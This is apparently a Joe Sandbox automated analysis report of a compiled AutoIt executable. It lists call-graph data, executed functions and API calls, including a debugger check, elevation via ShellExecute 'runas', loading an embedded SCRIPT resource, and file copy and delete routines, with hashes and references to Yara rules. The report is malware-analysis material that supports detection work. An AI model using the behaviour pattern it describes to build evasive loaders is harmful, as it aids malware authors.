106449 d4cfa4 106449->106446 106453 d4cfb8 FreeLibrary 106449->106453 106450 d4ce6b 106493 d4d649 107 API calls _free 106450->106493 106453->106446 106456->106449 106494 cd8d40 59 API calls Mailbox 106456->106494 106495 cd9d3c 60 API calls Mailbox 106456->106495 106497 d4d649 107 API calls _free 106456->106497 106458 cd7e4f 59 API calls 106457->106458 106459 d4d7c0 CharLowerBuffW 106458->106459 106498 d2f167 106459->106498 106463 cd7667 59 API calls 106464 d4d7f9 106463->106464 106465 cd784b 59 API calls 106464->106465 106466 d4d810 106465->106466 106467 cd7d2c 59 API calls 106466->106467 106468 d4d81c Mailbox 106467->106468 106469 d4d858 Mailbox 106468->106469 106505 d4cfdf 61 API calls 2 library calls 106468->106505 106469->106440 106471 d4c989 106470->106471 106475 d4c9de 106470->106475 106472 cf0db6 Mailbox 59 API calls 106471->106472 106473 d4c9ab 106472->106473 106474 cf0db6 Mailbox 59 API calls 106473->106474 106473->106475 106474->106473 106476 d4da50 106475->106476 106477 d4dc79 Mailbox 106476->106477 106484 d4da73 _strcat _wcscpy __NMSG_WRITE 106476->106484 106477->106435 106478 cd9be6 59 API calls 106478->106484 106479 cd9b3c 59 API calls 106479->106484 106480 cd9b98 59 API calls 106480->106484 106481 cd9837 84 API calls 106481->106484 106482 cf571c 58 API calls _W_store_winword 106482->106484 106484->106477 106484->106478 106484->106479 106484->106480 106484->106481 106484->106482 106508 d35887 61 API calls 2 library calls 106484->106508 106486 cf0c1d 106485->106486 106487 cf0cb5 VirtualAlloc 106486->106487 106488 cf0c83 106486->106488 106487->106488 106488->106438 106488->106439 106489->106440 106490->106440 106491->106444 106492->106450 106493->106456 106494->106456 106495->106456 106496->106427 106497->106456 106499 d2f192 __NMSG_WRITE 106498->106499 106500 d2f1d1 106499->106500 106503 d2f1c7 106499->106503 106504 d2f278 106499->106504 106500->106463 106500->106468 106503->106500 106506 cd78c4 61 API calls 106503->106506 106504->106500 106507 cd78c4 61 API calls 106504->106507 106505->106469 106506->106503 106507->106504 106508->106484 106509 cd3633 106510 cd366a 106509->106510 106511 cd3688 106510->106511 106512 cd36e7 106510->106512 106549 cd36e5 106510->106549 106513 cd374b PostQuitMessage 106511->106513 106514 cd3695 106511->106514 106516 cd36ed 106512->106516 106517 d0d0cc 106512->106517 106521 cd36d8 106513->106521 106519 d0d154 106514->106519 106520 cd36a0 106514->106520 106515 cd36ca DefWindowProcW 106515->106521 106522 cd3715 SetTimer RegisterWindowMessageW 106516->106522 106523 cd36f2 106516->106523 106558 ce1070 10 API calls Mailbox 106517->106558 106563 d32527 71 API calls _memset 106519->106563 106527 cd36a8 106520->106527 106528 cd3755 106520->106528 106522->106521 106529 cd373e CreatePopupMenu 106522->106529 106524 cd36f9 KillTimer 106523->106524 106525 d0d06f 106523->106525 106554 cd443a Shell_NotifyIconW _memset 106524->106554 106537 d0d074 106525->106537 106538 d0d0a8 MoveWindow 106525->106538 106526 d0d0f3 106559 ce1093 331 API calls Mailbox 106526->106559 106533 d0d139 106527->106533 106534 cd36b3 106527->106534 106556 cd44a0 64 API calls _memset 106528->106556 106529->106521 106533->106515 106562 d27c36 59 API calls Mailbox 106533->106562 106540 cd36be 106534->106540 106541 d0d124 106534->106541 106535 d0d166 106535->106515 106535->106521 106543 d0d097 SetFocus 106537->106543 106544 d0d078 106537->106544 106538->106521 106539 cd370c 106555 cd3114 DeleteObject DestroyWindow Mailbox 106539->106555 106540->106515 106560 cd443a Shell_NotifyIconW _memset 106540->106560 106561 d32d36 81 API calls _memset 106541->106561 106542 cd3764 106542->106521 106543->106521 106544->106540 106548 d0d081 106544->106548 106557 ce1070 10 API calls Mailbox 106548->106557 106549->106515 106552 d0d118 106553 cd434a 68 API calls 106552->106553 106553->106549 106554->106539 106555->106521 106556->106542 106557->106521 106558->106526 106559->106540 106560->106552 106561->106542 106562->106549 106563->106535 106564 d1416f 106568 d25fe6 106564->106568 106566 d1417a 106567 d25fe6 85 API calls 106566->106567 106567->106566 106569 d26020 106568->106569 106574 d25ff3 106568->106574 106569->106566 106570 d26022 106580 cd9328 84 API calls Mailbox 106570->106580 106572 d26027 106573 cd9837 84 API calls 106572->106573 106575 d2602e 106573->106575 106574->106569 106574->106570 106574->106572 106577 d2601a 106574->106577 106576 cd7b2e 59 API calls 106575->106576 106576->106569 106579 cd95a0 59 API calls _wcsstr 106577->106579 106579->106569 106580->106572 106581 d38d0d 106582 d38d1a 106581->106582 106584 d38d20 106581->106584 106585 cf2d55 _free 58 API calls 106582->106585 106583 d38d31 106587 d38d43 106583->106587 106588 cf2d55 _free 58 API calls 106583->106588 106584->106583 106586 cf2d55 _free 58 API calls 106584->106586 106585->106584 106586->106583 106588->106587

                                                            Executed Functions

                                                            Function 00CD3B3A Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153windowCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00CD3B68
                                                            • IsDebuggerPresent.KERNEL32 ref: 00CD3B7A
                                                            • GetFullPathNameW.KERNEL32(00007FFF,?,?,00D952F8,00D952E0,?,?), ref: 00CD3BEB
                                                              • Part of subcall function 00CD7BCC: _memmove.LIBCMT ref: 00CD7C06
                                                              • Part of subcall function 00CE092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00CD3C14,00D952F8,?,?,?), ref: 00CE096E
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00CD3C6F
                                                            • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00D87770,00000010), ref: 00D0D281
                                                            • SetCurrentDirectoryW.KERNEL32(?,00D952F8,?,?,?), ref: 00D0D2B9
                                                            • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00D84260,00D952F8,?,?,?), ref: 00D0D33F
                                                            • ShellExecuteW.SHELL32(00000000,?,?), ref: 00D0D346
                                                              • Part of subcall function 00CD3A46: GetSysColorBrush.USER32(0000000F), ref: 00CD3A50
                                                              • Part of subcall function 00CD3A46: LoadCursorW.USER32(00000000,00007F00), ref: 00CD3A5F
                                                              • Part of subcall function 00CD3A46: LoadIconW.USER32(00000063), ref: 00CD3A76
                                                              • Part of subcall function 00CD3A46: LoadIconW.USER32(000000A4), ref: 00CD3A88
                                                              • Part of subcall function 00CD3A46: LoadIconW.USER32(000000A2), ref: 00CD3A9A
                                                              • Part of subcall function 00CD3A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00CD3AC0
                                                              • Part of subcall function 00CD3A46: RegisterClassExW.USER32(?), ref: 00CD3B16
                                                              • Part of subcall function 00CD39D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00CD3A03
                                                              • Part of subcall function 00CD39D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00CD3A24
                                                              • Part of subcall function 00CD39D5: ShowWindow.USER32(00000000,?,?), ref: 00CD3A38
                                                              • Part of subcall function 00CD39D5: ShowWindow.USER32(00000000,?,?), ref: 00CD3A41
                                                              • Part of subcall function 00CD434A: _memset.LIBCMT ref: 00CD4370
                                                              • Part of subcall function 00CD434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00CD4415
                                                            Strings
                                                            • runas, xrefs: 00D0D33A
                                                            • This is a third-party compiled AutoIt script., xrefs: 00D0D279
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                            • String ID: This is a third-party compiled AutoIt script.$runas
                                                            • API String ID: 529118366-3287110873
                                                            • Opcode ID: 97f1c20610aaf94b4b367a3ff9933a32109e7f7de8abd4e28ff7a81679c0855d
                                                            • Instruction ID: 17d42429b9012c0d7bd872288971ebf2e39c3c589caa64362f498e9654796d88
                                                            • Opcode Fuzzy Hash: 97f1c20610aaf94b4b367a3ff9933a32109e7f7de8abd4e28ff7a81679c0855d
                                                            • Instruction Fuzzy Hash: 65510570A08388AEDF02EBB4EC05AED7B79AB45350F004167FA11E63A1DA708605DB35
                                                            Function 00CD49A0 Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 996 cd49a0-cd4a00 call cd7667 GetVersionExW call cd7bcc 1001 cd4b0b-cd4b0d 996->1001 1002 cd4a06 996->1002 1004 d0d767-d0d773 1001->1004 1003 cd4a09-cd4a0e 1002->1003 1006 cd4a14 1003->1006 1007 cd4b12-cd4b13 1003->1007 1005 d0d774-d0d778 1004->1005 1008 d0d77a 1005->1008 1009 d0d77b-d0d787 1005->1009 1010 cd4a15-cd4a4c call cd7d2c call cd7726 1006->1010 1007->1010 1008->1009 1009->1005 1011 d0d789-d0d78e 1009->1011 1019 d0d864-d0d867 1010->1019 1020 cd4a52-cd4a53 1010->1020 1011->1003 1013 d0d794-d0d79b 1011->1013 1013->1004 1015 d0d79d 1013->1015 1018 d0d7a2-d0d7a5 1015->1018 1021 d0d7ab-d0d7c9 1018->1021 1022 cd4a93-cd4aaa GetCurrentProcess IsWow64Process 1018->1022 1023 d0d880-d0d884 1019->1023 1024 d0d869 1019->1024 1020->1018 1025 cd4a59-cd4a64 1020->1025 1021->1022 1026 d0d7cf-d0d7d5 1021->1026 1032 cd4aac 1022->1032 1033 cd4aaf-cd4ac0 1022->1033 1030 d0d886-d0d88f 1023->1030 1031 d0d86f-d0d878 1023->1031 1027 d0d86c 1024->1027 1028 cd4a6a-cd4a6c 1025->1028 1029 d0d7ea-d0d7f0 1025->1029 1036 d0d7d7-d0d7da 1026->1036 1037 d0d7df-d0d7e5 1026->1037 1027->1031 1038 d0d805-d0d811 1028->1038 1039 cd4a72-cd4a75 1028->1039 1040 d0d7f2-d0d7f5 1029->1040 1041 d0d7fa-d0d800 1029->1041 1030->1027 1042 d0d891-d0d894 1030->1042 1031->1023 1032->1033 1034 cd4b2b-cd4b35 GetSystemInfo 1033->1034 1035 cd4ac2-cd4ad2 call cd4b37 1033->1035 1043 cd4af8-cd4b08 1034->1043 1053 cd4b1f-cd4b29 GetSystemInfo 1035->1053 1054 cd4ad4-cd4ae1 call cd4b37 1035->1054 1036->1022 1037->1022 1044 d0d813-d0d816 1038->1044 1045 d0d81b-d0d821 1038->1045 1047 d0d831-d0d834 1039->1047 1048 cd4a7b-cd4a8a 1039->1048 1040->1022 1041->1022 1042->1031 1044->1022 1045->1022 1047->1022 1050 d0d83a-d0d84f 1047->1050 1051 d0d826-d0d82c 1048->1051 1052 cd4a90 1048->1052 1055 d0d851-d0d854 1050->1055 1056 d0d859-d0d85f 1050->1056 1051->1022 1052->1022 1058 cd4ae9-cd4aed 1053->1058 1061 cd4b18-cd4b1d 1054->1061 1062 cd4ae3-cd4ae7 GetNativeSystemInfo 1054->1062 1055->1022 1056->1022 1058->1043 1060 cd4aef-cd4af2 FreeLibrary 1058->1060 1060->1043 1061->1062 1062->1058
                                                            APIs
                                                            • GetVersionExW.KERNEL32(?), ref: 00CD49CD
                                                              • Part of subcall function 00CD7BCC: _memmove.LIBCMT ref: 00CD7C06
                                                            • GetCurrentProcess.KERNEL32(?,00D5FAEC,00000000,00000000,?), ref: 00CD4A9A
                                                            • IsWow64Process.KERNEL32(00000000), ref: 00CD4AA1
                                                            • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00CD4AE7
                                                            • FreeLibrary.KERNEL32(00000000), ref: 00CD4AF2
                                                            • GetSystemInfo.KERNEL32(00000000), ref: 00CD4B23
                                                            • GetSystemInfo.KERNEL32(00000000), ref: 00CD4B2F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                            • String ID:
                                                            • API String ID: 1986165174-0
                                                            • Opcode ID: 2da872a21a041ddffd7bf266f62589b54b71955524dd179ef4689e53346e3215
                                                            • Instruction ID: 02ff76e7dfc6aecf76a2c35a1bc0b3b1bae24812d27760f71dfd803baa55b3c8
                                                            • Opcode Fuzzy Hash: 2da872a21a041ddffd7bf266f62589b54b71955524dd179ef4689e53346e3215
                                                            • Instruction Fuzzy Hash: C391A431989BC0DFC735DB6885506AABFF5AF29300B4849AFD2CB97B41D230E508D769
                                                            Function 00CD4E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1063 cd4e89-cd4ea1 CreateStreamOnHGlobal 1064 cd4ec1-cd4ec6 1063->1064 1065 cd4ea3-cd4eba FindResourceExW 1063->1065 1066 d0d933-d0d942 LoadResource 1065->1066 1067 cd4ec0 1065->1067 1066->1067 1068 d0d948-d0d956 SizeofResource 1066->1068 1067->1064 1068->1067 1069 d0d95c-d0d967 LockResource 1068->1069 1069->1067 1070 d0d96d-d0d98b 1069->1070 1070->1067
                                                            APIs
                                                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00CD4D8E,?,?,00000000,00000000), ref: 00CD4E99
                                                            • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00CD4D8E,?,?,00000000,00000000), ref: 00CD4EB0
                                                            • LoadResource.KERNEL32(?,00000000,?,?,00CD4D8E,?,?,00000000,00000000,?,?,?,?,?,?,00CD4E2F), ref: 00D0D937
                                                            • SizeofResource.KERNEL32(?,00000000,?,?,00CD4D8E,?,?,00000000,00000000,?,?,?,?,?,?,00CD4E2F), ref: 00D0D94C
                                                            • LockResource.KERNEL32(00CD4D8E,?,?,00CD4D8E,?,?,00000000,00000000,?,?,?,?,?,?,00CD4E2F,00000000), ref: 00D0D95F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                            • String ID: SCRIPT
                                                            • API String ID: 3051347437-3967369404
                                                            • Opcode ID: fb27b6ec5db92c3e48f79b5202c53cae3efef80e7594cbe03639eea3cc4a1114
                                                            • Instruction ID: 3526c18d095bf64d276e7e09221731e23ab58128e0c07968fcb185ff99e19186
                                                            • Opcode Fuzzy Hash: fb27b6ec5db92c3e48f79b5202c53cae3efef80e7594cbe03639eea3cc4a1114
                                                            • Instruction Fuzzy Hash: E71151B5240700BFD7258B65EC48F67BBBAFBC5751F104169FA15CA750DB71D8008671
                                                            Function 00D3445A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetFileAttributesW.KERNELBASE(?,00D0E398), ref: 00D3446A
                                                            • FindFirstFileW.KERNELBASE(?,?), ref: 00D3447B
                                                            • FindClose.KERNEL32(00000000), ref: 00D3448B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: FileFind$AttributesCloseFirst
                                                            • String ID:
                                                            • API String ID: 48322524-0
                                                            • Opcode ID: b2da3eacc719ab791b84583289bdefa0f9257d64edc9808151ada0628f8be6ed
                                                            • Instruction ID: 282960e5596691c0552c54473a60c6a5445deab82643bca6f80040b1d23d72cf
                                                            • Opcode Fuzzy Hash: b2da3eacc719ab791b84583289bdefa0f9257d64edc9808151ada0628f8be6ed
                                                            • Instruction Fuzzy Hash: FFE0D8724107006752106B38EC0D5E9775CDE05336F140725FD35C21E0E7B8A90096B6
                                                            Function 00CDE6A0 Relevance: 2.4, Strings: 1, Instructions: 1102COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • Variable must be of type 'Object'., xrefs: 00D13E62
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Variable must be of type 'Object'.
                                                            • API String ID: 0-109567571
                                                            • Opcode ID: cbc88fd007b412fb25283eeafedfd8df84ce2926ba3a090638554cfdb886e067
                                                            • Instruction ID: a1fd965a0fbbe10845ccac79533afab38a111cb4c2554f40e0dacbd0db9b5439
                                                            • Opcode Fuzzy Hash: cbc88fd007b412fb25283eeafedfd8df84ce2926ba3a090638554cfdb886e067
                                                            • Instruction Fuzzy Hash: 23A29074A00205DFCB14DF59C480AAEB7B2FF59314F64806AEA169F351D731EE82DBA0
                                                            Function 00CE09D0 Relevance: 57.3, APIs: 27, Strings: 5, Instructions: 1300windowsleeptimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00CE0A5B
                                                            • timeGetTime.WINMM ref: 00CE0D16
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00CE0E53
                                                            • Sleep.KERNEL32(0000000A), ref: 00CE0E61
                                                            • LockWindowUpdate.USER32(00000000,?,?), ref: 00CE0EFA
                                                            • DestroyWindow.USER32 ref: 00CE0F06
                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CE0F20
                                                            • Sleep.KERNEL32(0000000A,?,?), ref: 00D14E83
                                                            • TranslateMessage.USER32(?), ref: 00D15C60
                                                            • DispatchMessageW.USER32(?), ref: 00D15C6E
                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D15C82
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                            • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                            • API String ID: 4212290369-3242690629
                                                            • Opcode ID: 1864df97eb8d736d64ab77eb8adcc2fe8f62350653fa6ab785545d9b2fcfefca
                                                            • Instruction ID: be298e9e28d1274b41fa4c24719dcfdd4d6dd4a144dddab45e3ae146e4aa81a0
                                                            • Opcode Fuzzy Hash: 1864df97eb8d736d64ab77eb8adcc2fe8f62350653fa6ab785545d9b2fcfefca
                                                            • Instruction Fuzzy Hash: FAB2C270608741EFD724DF24E884BAAB7E1FF84304F24491DE599973A1CB74E984DBA2
                                                            Function 00D39155 Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 00D38F5F: __time64.LIBCMT ref: 00D38F69
                                                              • Part of subcall function 00CD4EE5: _fseek.LIBCMT ref: 00CD4EFD
                                                            • __wsplitpath.LIBCMT ref: 00D39234
                                                              • Part of subcall function 00CF40FB: __wsplitpath_helper.LIBCMT ref: 00CF413B
                                                            • _wcscpy.LIBCMT ref: 00D39247
                                                            • _wcscat.LIBCMT ref: 00D3925A
                                                            • __wsplitpath.LIBCMT ref: 00D3927F
                                                            • _wcscat.LIBCMT ref: 00D39295
                                                            • _wcscat.LIBCMT ref: 00D392A8
                                                              • Part of subcall function 00D38FA5: _memmove.LIBCMT ref: 00D38FDE
                                                              • Part of subcall function 00D38FA5: _memmove.LIBCMT ref: 00D38FED
                                                            • _wcscmp.LIBCMT ref: 00D391EF
                                                              • Part of subcall function 00D39734: _wcscmp.LIBCMT ref: 00D39824
                                                              • Part of subcall function 00D39734: _wcscmp.LIBCMT ref: 00D39837
                                                            • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00D39452
                                                            • _wcsncpy.LIBCMT ref: 00D394C5
                                                            • DeleteFileW.KERNEL32(?,?), ref: 00D394FB
                                                            • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00D39511
                                                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00D39522
                                                            • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00D39534
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                            • String ID:
                                                            • API String ID: 1500180987-0
                                                            • Opcode ID: aac826b1cfb10521f9d83cdf69f3be6e0c31f9373d6ec0eb172e5c9b95cdcb9c
                                                            • Instruction ID: ad36ebaf44ef8ee62c418e7008077140f8785a53a071f9b0b56693ff6c8657f0
                                                            • Opcode Fuzzy Hash: aac826b1cfb10521f9d83cdf69f3be6e0c31f9373d6ec0eb172e5c9b95cdcb9c
                                                            • Instruction Fuzzy Hash: 91C14CB1D00219ABDF25DF94CC95EEEB7BCEF45310F0040AAF609E6251DB709A849F65
                                                            Function 00CD301C Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 73windowregistryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • GetSysColorBrush.USER32(0000000F), ref: 00CD3074
                                                            • RegisterClassExW.USER32(00000030), ref: 00CD309E
                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00CD30AF
                                                            • InitCommonControlsEx.COMCTL32(?), ref: 00CD30CC
                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00CD30DC
                                                            • LoadIconW.USER32(000000A9), ref: 00CD30F2
                                                            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00CD3101
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                            • API String ID: 2914291525-1005189915
                                                            • Opcode ID: 4f801febb033d7e449de5a467db1739847e73fa02adb66ad6a04c9655e3541b5
                                                            • Instruction ID: 63b8fc5e9fbfe4bc0c652b7965e3a62c7407d99627554bda946aa4ba049f06d3
                                                            • Opcode Fuzzy Hash: 4f801febb033d7e449de5a467db1739847e73fa02adb66ad6a04c9655e3541b5
                                                            • Instruction Fuzzy Hash: 9E3116B1941309AFDB419FA4E889BDDBBF4FB09311F14416AE980EA3A0D3B50585CFA1
                                                            Function 00CD3041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • GetSysColorBrush.USER32(0000000F), ref: 00CD3074
                                                            • RegisterClassExW.USER32(00000030), ref: 00CD309E
                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00CD30AF
                                                            • InitCommonControlsEx.COMCTL32(?), ref: 00CD30CC
                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00CD30DC
                                                            • LoadIconW.USER32(000000A9), ref: 00CD30F2
                                                            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00CD3101
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
